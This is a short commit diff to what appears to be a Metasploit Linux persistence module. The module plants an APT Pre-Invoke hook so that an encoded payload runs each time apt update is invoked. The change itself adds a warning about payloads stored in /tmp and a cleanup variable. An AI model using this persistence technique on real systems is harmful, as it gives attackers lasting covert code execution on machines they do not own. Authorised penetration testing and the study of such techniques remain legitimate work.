persistence apt cleanup updates

h00die · h00die · commit 711d8d089670 · 2025-09-09T10:28:03.000-04:00
diff --git a/modules/exploits/linux/persistence/apt_package_manager.rb b/modules/exploits/linux/persistence/apt_package_manager.rb
@@ -67,6 +67,8 @@ def check
     return CheckCode::Safe('apt-get not found, likely not an apt based system') unless command_exists?('apt-get')
     return CheckCode::Safe("#{datastore['HOOKPATH']} not found") unless exists?(datastore['HOOKPATH'])
     return CheckCode::Safe("#{datastore['HOOKPATH']} not writable") unless writable?(datastore['HOOKPATH'])
+
+    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('/tmp')
     return CheckCode::Safe("#{datastore['WritableDir']} not found") unless exists?(datastore['WritableDir'])
     return CheckCode::Safe("#{datastore['WritableDir']} not writable") unless writable?(datastore['WritableDir'])
 
@@ -78,6 +80,7 @@ def install_persistence
     hook_path = datastore['HOOKPATH']
     hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")
 
+    @clean_up_rc = ''
     if payload.arch.first == 'cmd'
       hook_script = %(APT::Update::Pre-Invoke {"setsid #{payload.encoded} 2>/dev/null &"};)
     else
